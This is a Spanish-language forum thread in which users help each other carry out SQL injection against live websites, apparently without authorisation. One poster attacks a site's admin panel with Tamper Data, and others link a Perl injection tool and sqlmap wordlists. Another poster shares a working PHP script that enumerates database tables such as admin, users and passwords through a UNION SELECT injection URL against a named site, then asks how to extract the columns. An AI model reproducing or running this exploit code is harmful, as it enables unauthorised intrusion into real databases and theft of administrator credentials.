(DUDA) Haciendo SQL Injection.

Iniciado por flowskull, 24 Julio 2009, 04:26 AM

0 Miembros y 1 Visitante están viendo este tema.

aagos

uff muchas gracias soy incapaz de compilar el codigo me da siempre "invalid syntax" voy a probar otros metodos

Novlucker

#11
No he probado el code, pero veo un raw_input que no funciona en la última versión de python (se ha sustituído), cambialo por input.
Además el print debe de llevar paréntesis, pero bueno, si no tienes idea de esto mejor hacerlo a mano :P

Saludos


CitarEdite mi post para agregar el otro problema del script, no iba a poner otro porque básicamente no agrega mucho más al tema del SQL injection
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

aagos

#12
Tampoco amigo Novlucker pero gracias

Una ultima cosa todas las inyecciones las estoy haciendo desde URL modificando algunos parametros con el Tamper Data la base de datos es MySQL 5.0.27 y casi todas las inyecciones me devuelven:

Este fichero XML no parece tener ninguna información de estilo asociada. Se muestra debajo el árbol del documento.
     

<datos>
<resultado>-4</resultado>
</datos>


He llegado asta aqui "/admin/index.php?sc=fli" pero no consigo sacar ningun dato nisiquiera me da ningun error"
Gracias

MagnoBalt

Hola aagos. Ahi te paso un Script en Perl hecho por Loggin-root. Si estas en Linux no tendras ningun drama con perl pero en widnows tenes que bajarte el interprete.. Busca en Google..
Aqui va el Link.. valga la redundancia esta codeado en perl

http://argentinasec.blogspot.com/2008/07/sql-pw-v07-by-login-root.html


Saludos!!

aagos

Muchas gracias estoy aprendiendo muchisimo

negretei22

#15
Ya pude obtener la tabla de admin con un codigo SQL para php que hice, ahora los campos lo tengo que hacer de la misma manera??? con algun diccionari ode campos y probando campo por campo? a continuacion les dejo el codigo que hice...


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
</head>

<body>
<?
$pagina="http://www.susitio.com/consejos_detalle.php?advice_id=-2%20UNION/*!%20SELECT*/%201,version%28%29,3,4,5,6,7,8,9,10%20from%20users##";
$tablas=array("admin","tblUsers","tbl_users","tbl_admin","tblAdmin","user","users","username","usernames","usuario","name","names","nombre","nombres","usuarios","member","members","admin_table","miembro","miembros","membername","admins","administrator","administrators","passwd","password","passwords","pass","Pass","user_password","usua_login","user_passwords","user_name","user_names","member_password","mods","mod","moderators","moderator","user_email","user_emails","user_mail","user_mails","mail","emails","email","address","e-mail","emailaddress","correo","correos","phpbb_users","log","logins","login","registers","register","usr","usrs","banners");
echo "Leidas: " .count($tablas) ." palabras<br>";

/*$contenido = file($pagina);

$fp = fopen($contenido,"r") or die("OPEN");
echo $fp;*/
echo "<table><tr><td>Tabla</td><td>Resultado</td></tr>";
for($x=0;$x<count($tablas);$x++){
$pagina="http://www.susitio.com/consejos_detalle.php?advice_id=-2%20UNION/*!%20SELECT*/%201,9999,3,4,5,6,7,8,9,10%20from%20".$tablas[$x]."##";
      $fp = fopen($pagina, 'r');
       $content = '';
       while ($l = fread($fp, 1024)) $content .= $l;
       fclose($fp);
      $encuentra = strpos($content, "doesn't exist");
      if($encuentra)
      echo "<tr><td>".$tablas[$x]."</td><td>NO</td></tr>";
      else
      echo "<tr><td>".$tablas[$x]."</td><td><a href='sacacampos.php?pagina=".$pagina."'>SI</td></tr>";
      
      
}

      
?>
</body>
</html>


Saludos!

afdlkglfgfdgfhgf

te aporto con los common-columns , common-table y common-output , que trae por defecto sqlmap para que lo agregues en tu script.

http://www.2shared.com/file/e64Q8TWE/common.html


suerte ;).